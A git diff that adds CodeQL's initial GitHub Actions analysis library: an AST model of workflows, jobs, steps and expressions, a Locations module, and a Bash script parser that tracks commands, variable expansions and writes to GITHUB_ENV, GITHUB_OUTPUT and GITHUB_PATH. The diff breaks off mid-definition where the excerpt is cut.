diff --git a/.github/workflows/check-qldoc.yml b/.github/workflows/check-qldoc.yml index e64d661c7911..f10e0dc90b99 100644 --- a/.github/workflows/check-qldoc.yml +++ b/.github/workflows/check-qldoc.yml @@ -30,7 +30,8 @@ jobs: run: | EXIT_CODE=0 # TODO: remove the shared exception from the regex when coverage of qlpacks without dbschemes is supported - changed_lib_packs="$(git diff --name-only --diff-filter=ACMRT HEAD^ HEAD | { grep -Po '^(?!(shared))[a-z]*/ql/lib' || true; } | sort -u)" + # TODO: remove the actions exception once https://github.com/github/codeql-team/issues/3656 is fixed + changed_lib_packs="$(git diff --name-only --diff-filter=ACMRT HEAD^ HEAD | { grep -Po '^(?!(shared|actions))[a-z]*/ql/lib' || true; } | sort -u)" for pack_dir in ${changed_lib_packs}; do lang="${pack_dir%/ql/lib}" codeql generate library-doc-coverage --output="${RUNNER_TEMP}/${lang}-current.txt" --dir="${pack_dir}" diff --git a/actions/ql/lib/actions.qll b/actions/ql/lib/actions.qll index 073277dcace0..2c1d1cee9259 100644 --- a/actions/ql/lib/actions.qll +++ b/actions/ql/lib/actions.qll @@ -1 +1 @@ -predicate placeholder(int x) { x = 0 } +import codeql.actions.Ast diff --git a/actions/ql/lib/change-notes/2024-12-19-initial-release.md b/actions/ql/lib/change-notes/2024-12-19-initial-release.md new file mode 100644 index 000000000000..09263f5089d2 --- /dev/null +++ b/actions/ql/lib/change-notes/2024-12-19-initial-release.md @@ -0,0 +1,4 @@ +--- +category: feature +--- +* Initial public preview release diff --git a/actions/ql/lib/codeql-pack.lock.yml b/actions/ql/lib/codeql-pack.lock.yml new file mode 100644 index 000000000000..53004274575d --- /dev/null +++ b/actions/ql/lib/codeql-pack.lock.yml @@ -0,0 +1,4 @@ +--- +lockVersion: 1.0.0 +dependencies: {} +compiled: false diff --git a/actions/ql/lib/codeql/Locations.qll b/actions/ql/lib/codeql/Locations.qll new file mode 100644 index 000000000000..96b5d45f18e0 --- /dev/null +++ b/actions/ql/lib/codeql/Locations.qll @@ -0,0 +1,98 @@ +/** Provides classes for working with locations. */ + +import files.FileSystem +import codeql.actions.ast.internal.Ast + +bindingset[loc] +pragma[inline_late] +private string locationToString(Location loc) { + exists(string filepath, int startline, int startcolumn, int endline, int endcolumn | + loc.hasLocationInfo(filepath, startline, startcolumn, endline, endcolumn) and + result = filepath + "@" + startline + ":" + startcolumn + ":" + endline + ":" + endcolumn + ) +} + +newtype TLocation = + TBaseLocation(string filepath, int startline, int startcolumn, int endline, int endcolumn) { + exists(File file | + file.getAbsolutePath() = filepath and + locations_default(_, file, startline, startcolumn, endline, endcolumn) + ) + or + exists(ExpressionImpl e | + e.hasLocationInfo(filepath, startline, startcolumn, endline, endcolumn) + ) + or + filepath = "" and startline = 0 and startcolumn = 0 and endline = 0 and endcolumn = 0 + } + +/** + * A location as given by a file, a start line, a start column, + * an end line, and an end column. + * + * For more information about locations see [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). + */ +class Location extends TLocation, TBaseLocation { + string filepath; + int startline; + int startcolumn; + int endline; + int endcolumn; + + Location() { this = TBaseLocation(filepath, startline, startcolumn, endline, endcolumn) } + + /** Gets the file for this location. */ + File getFile() { + exists(File file | + file.getAbsolutePath() = filepath and + result = file + ) + } + + /** Gets the 1-based line number (inclusive) where this location starts. */ + int getStartLine() { result = startline } + + /** Gets the 1-based column number (inclusive) where this location starts. */ + int getStartColumn() { result = startcolumn } + + /** Gets the 1-based line number (inclusive) where this.getLocationDefault() location ends. */ + int getEndLine() { result = endline } + + /** Gets the 1-based column number (inclusive) where this.getLocationDefault() location ends. */ + int getEndColumn() { result = endcolumn } + + /** Gets the number of lines covered by this location. */ + int getNumLines() { result = endline - startline + 1 } + + /** Gets a textual representation of this element. */ + pragma[inline] + string toString() { result = locationToString(this) } + + /** + * Holds if this element is at the specified location. + * The location spans column `startcolumn` of line `startline` to + * column `endcolumn` of line `endline` in file `filepath`. + * For more information, see + * [Providing locations in CodeQL queries](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). + */ + predicate hasLocationInfo(string p, int sl, int sc, int el, int ec) { + p = filepath and + sl = startline and + sc = startcolumn and + el = endline and + ec = endcolumn + } + + /** Holds if this location starts strictly before the specified location. */ + pragma[inline] + predicate strictlyBefore(Location other) { + this.getStartLine() < other.getStartLine() + or + this.getStartLine() = other.getStartLine() and this.getStartColumn() < other.getStartColumn() + } +} + +/** An entity representing an empty location. */ +class EmptyLocation extends Location { + EmptyLocation() { this.hasLocationInfo("", 0, 0, 0, 0) } +} diff --git a/actions/ql/lib/codeql/actions/Ast.qll b/actions/ql/lib/codeql/actions/Ast.qll new file mode 100644 index 000000000000..8c1925f3288c --- /dev/null +++ b/actions/ql/lib/codeql/actions/Ast.qll @@ -0,0 +1,400 @@ +private import codeql.actions.ast.internal.Ast +private import codeql.Locations +import codeql.actions.Helper + +class AstNode instanceof AstNodeImpl { + AstNode getAChildNode() { result = super.getAChildNode() } + + AstNode getParentNode() { result = super.getParentNode() } + + string getAPrimaryQlClass() { result = super.getAPrimaryQlClass() } + + Location getLocation() { result = super.getLocation() } + + string toString() { result = super.toString() } + + Step getEnclosingStep() { result = super.getEnclosingStep() } + + Job getEnclosingJob() { result = super.getEnclosingJob() } + + Event getATriggerEvent() { result = super.getATriggerEvent() } + + Workflow getEnclosingWorkflow() { result = super.getEnclosingWorkflow() } + + CompositeAction getEnclosingCompositeAction() { result = super.getEnclosingCompositeAction() } + + Expression getInScopeEnvVarExpr(string name) { result = super.getInScopeEnvVarExpr(name) } + + ScalarValue getInScopeDefaultValue(string name, string prop) { + result = super.getInScopeDefaultValue(name, prop) + } +} + +class ScalarValue extends AstNode instanceof ScalarValueImpl { + string getValue() { result = super.getValue() } +} + +class Expression extends AstNode instanceof ExpressionImpl { + string expression; + string rawExpression; + + Expression() { + expression = this.getExpression() and + rawExpression = this.getRawExpression() + } + + string getExpression() { result = expression } + + string getRawExpression() { result = rawExpression } + + string getNormalizedExpression() { result = normalizeExpr(expression) } +} + +/** A common class for `env` in workflow, job or step. */ +abstract class Env extends AstNode instanceof EnvImpl { + /** Gets an environment variable value given its name. */ + ScalarValueImpl getEnvVarValue(string name) { result = super.getEnvVarValue(name) } + + /** Gets an environment variable value. */ + ScalarValueImpl getAnEnvVarValue() { result = super.getAnEnvVarValue() } + + /** Gets an environment variable expressin given its name. */ + ExpressionImpl getEnvVarExpr(string name) { result = super.getEnvVarExpr(name) } + + /** Gets an environment variable expression. */ + ExpressionImpl getAnEnvVarExpr() { result = super.getAnEnvVarExpr() } +} + +/** + * A custom composite action. This is a mapping at the top level of an Actions YAML action file. + * See https://docs.github.com/en/actions/creating-actions/metadata-syntax-for-github-actions. + */ +class CompositeAction extends AstNode instanceof CompositeActionImpl { + Runs getRuns() { result = super.getRuns() } + + Outputs getOutputs() { result = super.getOutputs() } + + Expression getAnOutputExpr() { result = super.getAnOutputExpr() } + + Expression getOutputExpr(string outputName) { result = super.getOutputExpr(outputName) } + + Input getAnInput() { result = super.getAnInput() } + + Input getInput(string inputName) { result = super.getInput(inputName) } + + LocalJob getACallerJob() { result = super.getACallerJob() } + + UsesStep getACallerStep() { result = super.getACallerStep() } + + predicate isPrivileged() { super.isPrivileged() } +} + +/** + * An Actions workflow. This is a mapping at the top level of an Actions YAML workflow file. + * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions. + */ +class Workflow extends AstNode instanceof WorkflowImpl { + Env getEnv() { result = super.getEnv() } + + string getName() { result = super.getName() } + + Job getAJob() { result = super.getAJob() } + + Job getJob(string jobId) { result = super.getJob(jobId) } + + Permissions getPermissions() { result = super.getPermissions() } + + Strategy getStrategy() { result = super.getStrategy() } + + On getOn() { result = super.getOn() } +} + +class ReusableWorkflow extends Workflow instanceof ReusableWorkflowImpl { + Outputs getOutputs() { result = super.getOutputs() } + + Expression getAnOutputExpr() { result = super.getAnOutputExpr() } + + Expression getOutputExpr(string outputName) { result = super.getOutputExpr(outputName) } + + Input getAnInput() { result = super.getAnInput() } + + Input getInput(string inputName) { result = super.getInput(inputName) } + + ExternalJob getACaller() { result = super.getACaller() } +} + +class Input extends AstNode instanceof InputImpl { } + +class Default extends AstNode instanceof DefaultsImpl { + ScalarValue getValue(string name, string prop) { result = super.getValue(name, prop) } +} + +class Outputs extends AstNode instanceof OutputsImpl { + Expression getAnOutputExpr() { result = super.getAnOutputExpr() } + + Expression getOutputExpr(string outputName) { result = super.getOutputExpr(outputName) } + + override string toString() { result = "Job outputs node" } +} + +class Permissions extends AstNode instanceof PermissionsImpl { + bindingset[perm] + string getPermission(string perm) { result = super.getPermission(perm) } + + string getAPermission() { result = super.getAPermission() } +} + +class Strategy extends AstNode instanceof StrategyImpl { + Expression getMatrixVarExpr(string varName) { result = super.getMatrixVarExpr(varName) } + + Expression getAMatrixVarExpr() { result = super.getAMatrixVarExpr() } +} + +/** + * https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#jobsjob_idneeds + */ +class Needs extends AstNode instanceof NeedsImpl { + Job getANeededJob() { result = super.getANeededJob() } +} + +class On extends AstNode instanceof OnImpl { + Event getAnEvent() { result = super.getAnEvent() } +} + +class Event extends AstNode instanceof EventImpl { + string getName() { result = super.getName() } + + string getAnActivityType() { result = super.getAnActivityType() } + + string getAPropertyValue(string prop) { result = super.getAPropertyValue(prop) } + + predicate hasProperty(string prop) { super.hasProperty(prop) } + + predicate isExternallyTriggerable() { super.isExternallyTriggerable() } + + predicate isPrivileged() { super.isPrivileged() } +} + +/** + * An Actions job within a workflow. + * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobs. + */ +abstract class Job extends AstNode instanceof JobImpl { + string getId() { result = super.getId() } + + Workflow getWorkflow() { result = super.getWorkflow() } + + Job getANeededJob() { result = super.getANeededJob() } + + Outputs getOutputs() { result = super.getOutputs() } + + Expression getAnOutputExpr() { result = super.getAnOutputExpr() } + + Expression getOutputExpr(string outputName) { result = super.getOutputExpr(outputName) } + + Env getEnv() { result = super.getEnv() } + + If getIf() { result = super.getIf() } + + Environment getEnvironment() { result = super.getEnvironment() } + + Permissions getPermissions() { result = super.getPermissions() } + + Strategy getStrategy() { result = super.getStrategy() } + + string getARunsOnLabel() { result = super.getARunsOnLabel() } + + predicate isPrivileged() { super.isPrivileged() } + + predicate isPrivilegedExternallyTriggerable(Event event) { + super.isPrivilegedExternallyTriggerable(event) + } +} + +abstract class StepsContainer extends AstNode instanceof StepsContainerImpl { + Step getAStep() { result = super.getAStep() } + + Step getStep(int i) { result = super.getStep(i) } +} + +/** + * An `runs` mapping in a custom composite action YAML. + * See https://docs.github.com/en/actions/creating-actions/metadata-syntax-for-github-actions#runs + */ +class Runs extends StepsContainer instanceof RunsImpl { + CompositeAction getAction() { result = super.getAction() } +} + +/** + * An Actions job within a workflow which is composed of steps. + * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobs. + */ +class LocalJob extends Job, StepsContainer instanceof LocalJobImpl { } + +/** + * A step within an Actions job. + * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobsjob_idsteps. + */ +class Step extends AstNode instanceof StepImpl { + string getId() { result = super.getId() } + + Env getEnv() { result = super.getEnv() } + + If getIf() { result = super.getIf() } + + StepsContainer getContainer() { result = super.getContainer() } + + Step getNextStep() { result = super.getNextStep() } + + Step getAFollowingStep() { result = super.getAFollowingStep() } +} + +/** + * An If node representing a conditional statement. + */ +class If extends AstNode instanceof IfImpl { + string getCondition() { result = super.getCondition() } + + Expression getConditionExpr() { result = super.getConditionExpr() } + + string getConditionStyle() { result = super.getConditionStyle() } +} + +/** + * An Environemnt node representing a deployment environment. + */ +class Environment extends AstNode instanceof EnvironmentImpl { + string getName() { result = super.getName() } + + Expression getNameExpr() { result = super.getNameExpr() } +} + +abstract class Uses extends AstNode instanceof UsesImpl { + string getCallee() { result = super.getCallee() } + + ScalarValue getCalleeNode() { result = super.getCalleeNode() } + + string getVersion() { result = super.getVersion() } + + int getMajorVersion() { result = super.getMajorVersion() } + + string getArgument(string argName) { result = super.getArgument(argName) } + + Expression getArgumentExpr(string argName) { result = super.getArgumentExpr(argName) } +} + +class UsesStep extends Step, Uses instanceof UsesStepImpl { } + +class ExternalJob extends Job, Uses instanceof ExternalJobImpl { } + +/** + * A `run` field within an Actions job step, which runs command-line programs using an operating system shell. + * See https://docs.github.com/en/free-pro-team@latest/actions/reference/workflow-syntax-for-github-actions#jobsjob_idstepsrun. + */ +class Run extends Step instanceof RunImpl { + ShellScript getScript() { result = super.getScript() } + + Expression getAnScriptExpr() { result = super.getAnScriptExpr() } + + string getWorkingDirectory() { result = super.getWorkingDirectory() } + + string getShell() { result = super.getShell() } +} + +class ShellScript extends ScalarValueImpl instanceof ShellScriptImpl { + string getRawScript() { result = super.getRawScript() } + + string getStmt(int i) { result = super.getStmt(i) } + + string getAStmt() { result = super.getAStmt() } + + string getCommand(int i) { result = super.getCommand(i) } + + string getACommand() { result = super.getACommand() } + + string getFileReadCommand(int i) { result = super.getFileReadCommand(i) } + + string getAFileReadCommand() { result = super.getAFileReadCommand() } + + predicate getAssignment(int i, string name, string data) { super.getAssignment(i, name, data) } + + predicate getAnAssignment(string name, string data) { super.getAnAssignment(name, data) } + + predicate getAWriteToGitHubEnv(string name, string data) { + super.getAWriteToGitHubEnv(name, data) + } + + predicate getAWriteToGitHubOutput(string name, string data) { + super.getAWriteToGitHubOutput(name, data) + } + + predicate getAWriteToGitHubPath(string data) { super.getAWriteToGitHubPath(data) } + + predicate getAnEnvReachingGitHubOutputWrite(string var, string output_field) { + super.getAnEnvReachingGitHubOutputWrite(var, output_field) + } + + predicate getACmdReachingGitHubOutputWrite(string cmd, string output_field) { + super.getACmdReachingGitHubOutputWrite(cmd, output_field) + } + + predicate getAnEnvReachingGitHubEnvWrite(string var, string output_field) { + super.getAnEnvReachingGitHubEnvWrite(var, output_field) + } + + predicate getACmdReachingGitHubEnvWrite(string cmd, string output_field) { + super.getACmdReachingGitHubEnvWrite(cmd, output_field) + } + + predicate getAnEnvReachingGitHubPathWrite(string var) { + super.getAnEnvReachingGitHubPathWrite(var) + } + + predicate getACmdReachingGitHubPathWrite(string cmd) { super.getACmdReachingGitHubPathWrite(cmd) } + + predicate getAnEnvReachingArgumentInjectionSink(string var, string command, string argument) { + super.getAnEnvReachingArgumentInjectionSink(var, command, argument) + } + + predicate getACmdReachingArgumentInjectionSink(string cmd, string command, string argument) { + super.getACmdReachingArgumentInjectionSink(cmd, command, argument) + } + + predicate fileToGitHubEnv(string path) { super.fileToGitHubEnv(path) } + + predicate fileToGitHubOutput(string path) { super.fileToGitHubOutput(path) } + + predicate fileToGitHubPath(string path) { super.fileToGitHubPath(path) } +} + +abstract class SimpleReferenceExpression extends AstNode instanceof SimpleReferenceExpressionImpl { + string getFieldName() { result = super.getFieldName() } + + AstNode getTarget() { result = super.getTarget() } +} + +class JsonReferenceExpression extends AstNode instanceof JsonReferenceExpressionImpl { + string getAccessPath() { result = super.getAccessPath() } + + string getInnerExpression() { result = super.getInnerExpression() } +} + +class GitHubExpression extends SimpleReferenceExpression instanceof GitHubExpressionImpl { } + +class SecretsExpression extends SimpleReferenceExpression instanceof SecretsExpressionImpl { } + +class StepsExpression extends SimpleReferenceExpression instanceof StepsExpressionImpl { + string getStepId() { result = super.getStepId() } +} + +class NeedsExpression extends SimpleReferenceExpression instanceof NeedsExpressionImpl { + string getNeededJobId() { result = super.getNeededJobId() } +} + +class JobsExpression extends SimpleReferenceExpression instanceof JobsExpressionImpl { } + +class InputsExpression extends SimpleReferenceExpression instanceof InputsExpressionImpl { } + +class EnvExpression extends SimpleReferenceExpression instanceof EnvExpressionImpl { } + +class MatrixExpression extends SimpleReferenceExpression instanceof MatrixExpressionImpl { } diff --git a/actions/ql/lib/codeql/actions/Bash.qll b/actions/ql/lib/codeql/actions/Bash.qll new file mode 100644 index 000000000000..7f2d4aeef9c3 --- /dev/null +++ b/actions/ql/lib/codeql/actions/Bash.qll @@ -0,0 +1,722 @@ +private import codeql.actions.Ast + +class BashShellScript extends ShellScript { + BashShellScript() { + exists(Run run | + this = run.getScript() and + run.getShell().matches(["bash%", "sh"]) + ) + } + + private string lineProducer(int i) { + result = this.getRawScript().regexpReplaceAll("\\\\\\s*\n", "").splitAt("\n", i) + } + + private predicate cmdSubstitutionReplacement(string cmdSubs, string id, int k) { + exists(string line | line = this.lineProducer(k) | + exists(int i, int j | + cmdSubs = + // $() cmd substitution + line.regexpFind("\\$\\((?:[^()]+|\\((?:[^()]+|\\([^()]*\\))*\\))*\\)", i, j) + .regexpReplaceAll("^\\$\\(", "") + .regexpReplaceAll("\\)$", "") and + id = "cmdsubs:" + k + ":" + i + ":" + j + ) + or + exists(int i, int j | + // `...` cmd substitution + cmdSubs = + line.regexpFind("\\`[^\\`]+\\`", i, j) + .regexpReplaceAll("^\\`", "") + .regexpReplaceAll("\\`$", "") and + id = "cmd:" + k + ":" + i + ":" + j + ) + ) + } + + private predicate rankedCmdSubstitutionReplacements(int i, string old, string new) { + old = rank[i](string old2 | this.cmdSubstitutionReplacement(old2, _, _) | old2) and + this.cmdSubstitutionReplacement(old, new, _) + } + + private predicate doReplaceCmdSubstitutions(int line, int round, string old, string new) { + round = 0 and + old = this.lineProducer(line) and + new = old + or + round > 0 and + exists(string middle, string target, string replacement | + this.doReplaceCmdSubstitutions(line, round - 1, old, middle) and + this.rankedCmdSubstitutionReplacements(round, target, replacement) and + new = middle.replaceAll(target, replacement) + ) + } + + private string cmdSubstitutedLineProducer(int i) { + // script lines where any command substitution has been replaced with a unique placeholder + result = + max(int round, string new | + this.doReplaceCmdSubstitutions(i, round, _, new) + | + new order by round + ) + or + this.cmdSubstitutionReplacement(result, _, i) + } + + private predicate quotedStringReplacement(string quotedStr, string id) { + exists(string line, int k | line = this.cmdSubstitutedLineProducer(k) | + exists(int i, int j | + // double quoted string + quotedStr = line.regexpFind("\"((?:[^\"\\\\]|\\\\.)*)\"", i, j) and + id = + "qstr:" + k + ":" + i + ":" + j + ":" + quotedStr.length() + ":" + + quotedStr.regexpReplaceAll("[^a-zA-Z0-9]", "") + ) + or + exists(int i, int j | + // single quoted string + quotedStr = line.regexpFind("'((?:\\\\.|[^'\\\\])*)'", i, j) and + id = + "qstr:" + k + ":" + i + ":" + j + ":" + quotedStr.length() + ":" + + quotedStr.regexpReplaceAll("[^a-zA-Z0-9]", "") + ) + ) + } + + private predicate rankedQuotedStringReplacements(int i, string old, string new) { + old = rank[i](string old2 | this.quotedStringReplacement(old2, _) | old2) and + this.quotedStringReplacement(old, new) + } + + private predicate doReplaceQuotedStrings(int line, int round, string old, string new) { + round = 0 and + old = this.cmdSubstitutedLineProducer(line) and + new = old + or + round > 0 and + exists(string middle, string target, string replacement | + this.doReplaceQuotedStrings(line, round - 1, old, middle) and + this.rankedQuotedStringReplacements(round, target, replacement) and + new = middle.replaceAll(target, replacement) + ) + } + + private string quotedStringLineProducer(int i) { + result = + max(int round, string new | this.doReplaceQuotedStrings(i, round, _, new) | new order by round) + } + + private string stmtProducer(int i) { + result = this.quotedStringLineProducer(i).splitAt(Bash::splitSeparator()).trim() and + // when splitting the line with a separator that is not present, the result is the original line which may contain other separators + // we only one the split parts that do not contain any of the separators + not result.indexOf(Bash::splitSeparator()) > -1 + } + + private predicate doStmtRestoreQuotedStrings(int line, int round, string old, string new) { + round = 0 and + old = this.stmtProducer(line) and + new = old + or + round > 0 and + exists(string middle, string target, string replacement | + this.doStmtRestoreQuotedStrings(line, round - 1, old, middle) and + this.rankedQuotedStringReplacements(round, target, replacement) and + new = middle.replaceAll(replacement, target) + ) + } + + private string restoredStmtQuotedStringLineProducer(int i) { + result = + max(int round, string new | + this.doStmtRestoreQuotedStrings(i, round, _, new) + | + new order by round + ) and + not result.indexOf("qstr:") > -1 + } + + private predicate doStmtRestoreCmdSubstitutions(int line, int round, string old, string new) { + round = 0 and + old = this.restoredStmtQuotedStringLineProducer(line) and + new = old + or + round > 0 and + exists(string middle, string target, string replacement | + this.doStmtRestoreCmdSubstitutions(line, round - 1, old, middle) and + this.rankedCmdSubstitutionReplacements(round, target, replacement) and + new = middle.replaceAll(replacement, target) + ) + } + + override string getStmt(int i) { + result = + max(int round, string new | + this.doStmtRestoreCmdSubstitutions(i, round, _, new) + | + new order by round + ) and + not result.indexOf("cmdsubs:") > -1 + } + + override string getAStmt() { result = this.getStmt(_) } + + private string cmdProducer(int i) { + result = this.quotedStringLineProducer(i).splitAt(Bash::separator()).trim() and + // when splitting the line with a separator that is not present, the result is the original line which may contain other separators + // we only one the split parts that do not contain any of the separators + not result.indexOf(Bash::separator()) > -1 + } + + private predicate doCmdRestoreQuotedStrings(int line, int round, string old, string new) { + round = 0 and + old = this.cmdProducer(line) and + new = old + or + round > 0 and + exists(string middle, string target, string replacement | + this.doCmdRestoreQuotedStrings(line, round - 1, old, middle) and + this.rankedQuotedStringReplacements(round, target, replacement) and + new = middle.replaceAll(replacement, target) + ) + } + + private string restoredCmdQuotedStringLineProducer(int i) { + result = + max(int round, string new | + this.doCmdRestoreQuotedStrings(i, round, _, new) + | + new order by round + ) and + not result.indexOf("qstr:") > -1 + } + + private predicate doCmdRestoreCmdSubstitutions(int line, int round, string old, string new) { + round = 0 and + old = this.restoredCmdQuotedStringLineProducer(line) and + new = old + or + round > 0 and + exists(string middle, string target, string replacement | + this.doCmdRestoreCmdSubstitutions(line, round - 1, old, middle) and + this.rankedCmdSubstitutionReplacements(round, target, replacement) and + new = middle.replaceAll(replacement, target) + ) + } + + string getCmd(int i) { + result = + max(int round, string new | + this.doCmdRestoreCmdSubstitutions(i, round, _, new) + | + new order by round + ) and + not result.indexOf("cmdsubs:") > -1 + } + + string getACmd() { result = this.getCmd(_) } + + override string getCommand(int i) { + // remove redirection + result = + this.getCmd(i) + .regexpReplaceAll("(>|>>|2>|2>>|<|<<<)\\s*[\\{\\}\\$\"'_\\-0-9a-zA-Z]+$", "") + .trim() and + // exclude variable declarations + not result.regexpMatch("^[a-zA-Z0-9\\-_]+=") and + // exclude comments + not result.trim().indexOf("#") = 0 and + // exclude the following keywords + not result = + [ + "", "for", "in", "do", "done", "if", "then", "else", "elif", "fi", "while", "until", "case", + "esac", "{", "}" + ] + } + + override string getACommand() { result = this.getCommand(_) } + + override string getFileReadCommand(int i) { + result = this.getStmt(i) and + result.matches(Bash::fileReadCommand() + "%") + } + + override string getAFileReadCommand() { result = this.getFileReadCommand(_) } + + override predicate getAssignment(int i, string name, string data) { + exists(string stmt | + stmt = this.getStmt(i) and + name = stmt.regexpCapture("^([a-zA-Z0-9\\-_]+)=.*", 1) and + data = stmt.regexpCapture("^[a-zA-Z0-9\\-_]+=(.*)", 1) + ) + } + + override predicate getAnAssignment(string name, string data) { this.getAssignment(_, name, data) } + + override predicate getAWriteToGitHubEnv(string name, string data) { + exists(string raw | + Bash::extractFileWrite(this, "GITHUB_ENV", raw) and + Bash::extractVariableAndValue(raw, name, data) + ) + } + + override predicate getAWriteToGitHubOutput(string name, string data) { + exists(string raw | + Bash::extractFileWrite(this, "GITHUB_OUTPUT", raw) and + Bash::extractVariableAndValue(raw, name, data) + ) + } + + override predicate getAWriteToGitHubPath(string data) { + Bash::extractFileWrite(this, "GITHUB_PATH", data) + } + + override predicate getAnEnvReachingGitHubOutputWrite(string var, string output_field) { + Bash::envReachingGitHubFileWrite(this, var, "GITHUB_OUTPUT", output_field) + } + + override predicate getACmdReachingGitHubOutputWrite(string cmd, string output_field) { + Bash::cmdReachingGitHubFileWrite(this, cmd, "GITHUB_OUTPUT", output_field) + } + + override predicate getAnEnvReachingGitHubEnvWrite(string var, string output_field) { + Bash::envReachingGitHubFileWrite(this, var, "GITHUB_ENV", output_field) + } + + override predicate getACmdReachingGitHubEnvWrite(string cmd, string output_field) { + Bash::cmdReachingGitHubFileWrite(this, cmd, "GITHUB_ENV", output_field) + } + + override predicate getAnEnvReachingGitHubPathWrite(string var) { + Bash::envReachingGitHubFileWrite(this, var, "GITHUB_PATH", _) + } + + override predicate getACmdReachingGitHubPathWrite(string cmd) { + Bash::cmdReachingGitHubFileWrite(this, cmd, "GITHUB_PATH", _) + } + + override predicate getAnEnvReachingArgumentInjectionSink( + string var, string command, string argument + ) { + Bash::envReachingArgumentInjectionSink(this, var, command, argument) + } + + override predicate getACmdReachingArgumentInjectionSink( + string cmd, string command, string argument + ) { + Bash::cmdReachingArgumentInjectionSink(this, cmd, command, argument) + } + + override predicate fileToGitHubEnv(string path) { + Bash::fileToFileWrite(this, "GITHUB_ENV", path) + } + + override predicate fileToGitHubOutput(string path) { + Bash::fileToFileWrite(this, "GITHUB_OUTPUT", path) + } + + override predicate fileToGitHubPath(string path) { + Bash::fileToFileWrite(this, "GITHUB_PATH", path) + } +} + +module Bash { + string stmtSeparator() { result = ";" } + + string commandSeparator() { result = ["&&", "||"] } + + string splitSeparator() { + result = stmtSeparator() or + result = commandSeparator() + } + + string redirectionSeparator() { result = [">", ">>", "2>", "2>>", ">&", "2>&", "<", "<<<"] } + + string pipeSeparator() { result = "|" } + + string separator() { + result = stmtSeparator() or + result = commandSeparator() or + result = pipeSeparator() + } + + string fileReadCommand() { result = ["<", "cat", "jq", "yq", "tail", "head"] } + + /** Checks if expr is a bash command substitution */ + bindingset[expr] + predicate isCmdSubstitution(string expr, string cmd) { + exists(string regexp | + // $(cmd) + regexp = "\\$\\(([^)]+)\\)" and + cmd = expr.regexpCapture(regexp, 1) + or + // `cmd` + regexp = "`([^`]+)`" and + cmd = expr.regexpCapture(regexp, 1) + ) + } + + /** Checks if expr is a bash command substitution */ + bindingset[expr] + predicate containsCmdSubstitution(string expr, string cmd) { + exists(string regexp | + // $(cmd) + regexp = ".*\\$\\(([^)]+)\\).*" and + cmd = expr.regexpCapture(regexp, 1).trim() + or + // `cmd` + regexp = ".*`([^`]+)`.*" and + cmd = expr.regexpCapture(regexp, 1).trim() + ) + } + + /** Checks if expr is a bash parameter expansion */ + bindingset[expr] + predicate isParameterExpansion(string expr, string parameter, string operator, string params) { + exists(string regexp | + // $VAR + regexp = "\\$([a-zA-Z_][a-zA-Z0-9_]+)\\b" and + parameter = expr.regexpCapture(regexp, 1) and + operator = "" and + params = "" + or + // ${VAR} + regexp = "\\$\\{([a-zA-Z_][a-zA-Z0-9_]*)\\}" and + parameter = expr.regexpCapture(regexp, 1) and + operator = "" and + params = "" + or + // ${!VAR} + regexp = "\\$\\{([!#])([a-zA-Z_][a-zA-Z0-9_]*)\\}" and + parameter = expr.regexpCapture(regexp, 2) and + operator = expr.regexpCapture(regexp, 1) and + params = "" + or + // ${VAR}, ... + regexp = "\\$\\{([a-zA-Z_][a-zA-Z0-9_]*)([#%/:^,\\-+]{1,2})?(.*?)\\}" and + parameter = expr.regexpCapture(regexp, 1) and + operator = expr.regexpCapture(regexp, 2) and + params = expr.regexpCapture(regexp, 3) + ) + } + + bindingset[expr] + predicate containsParameterExpansion(string expr, string parameter, string operator, string params) { + exists(string regexp | + // $VAR + regexp = ".*\\$([a-zA-Z_][a-zA-Z0-9_]+)\\b.*" and + parameter = expr.regexpCapture(regexp, 1) and + operator = "" and + params = "" + or + // ${VAR} + regexp = ".*\\$\\{([a-zA-Z_][a-zA-Z0-9_]*)\\}.*" and + parameter = expr.regexpCapture(regexp, 1) and + operator = "" and + params = "" + or + // ${!VAR} + regexp = ".*\\$\\{([!#])([a-zA-Z_][a-zA-Z0-9_]*)\\}.*" and + parameter = expr.regexpCapture(regexp, 2) and + operator = expr.regexpCapture(regexp, 1) and + params = "" + or + // ${VAR}, ... + regexp = ".*\\$\\{([a-zA-Z_][a-zA-Z0-9_]*)([#%/:^,\\-+]{1,2})?(.*?)\\}.*" and + parameter = expr.regexpCapture(regexp, 1) and + operator = expr.regexpCapture(regexp, 2) and + params = expr.regexpCapture(regexp, 3) + ) + } + + bindingset[raw_content] + predicate extractVariableAndValue(string raw_content, string key, string value) { + exists(string regexp, string content | content = trimQuotes(raw_content) | + regexp = "(?msi).*^([a-zA-Z_][a-zA-Z0-9_]*)\\s*<<\\s*['\"]?(\\S+)['\"]?\\s*\n(.*?)\n\\2\\s*$" and + key = trimQuotes(content.regexpCapture(regexp, 1)) and + value = trimQuotes(content.regexpCapture(regexp, 3)) + or + exists(string line | + line = content.splitAt("\n") and + regexp = "(?i)^([a-zA-Z_][a-zA-Z0-9_\\-]*)\\s*=\\s*(.*)$" and + key = trimQuotes(line.regexpCapture(regexp, 1)) and + value = trimQuotes(line.regexpCapture(regexp, 2)) + ) + ) + } + + bindingset[script] + predicate singleLineFileWrite( + string script, string cmd, string file, string content, string filters + ) { + exists(string regexp | + regexp = "(?i)(echo|printf)\\s*(.*?)\\s*(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+)" and + cmd = script.regexpCapture(regexp, 1) and + file = trimQuotes(script.regexpCapture(regexp, 5)) and + filters = "" and + content = script.regexpCapture(regexp, 2) + ) + } + + bindingset[script] + predicate singleLineWorkflowCmd(string script, string cmd, string key, string value) { + exists(string regexp | + regexp = "(?i)(echo|printf)\\s*(['|\"])?::(set-[a-z]+)\\s*name\\s*=\\s*(.*?)::(.*)" and + cmd = script.regexpCapture(regexp, 3) and + key = script.regexpCapture(regexp, 4) and + value = trimQuotes(script.regexpCapture(regexp, 5)) + or + regexp = "(?i)(echo|printf)\\s*(['|\"])?::(add-[a-z]+)\\s*::(.*)" and + cmd = script.regexpCapture(regexp, 3) and + key = "" and + value = trimQuotes(script.regexpCapture(regexp, 4)) + ) + } + + bindingset[script] + predicate heredocFileWrite(string script, string cmd, string file, string content, string filters) { + exists(string regexp | + regexp = + 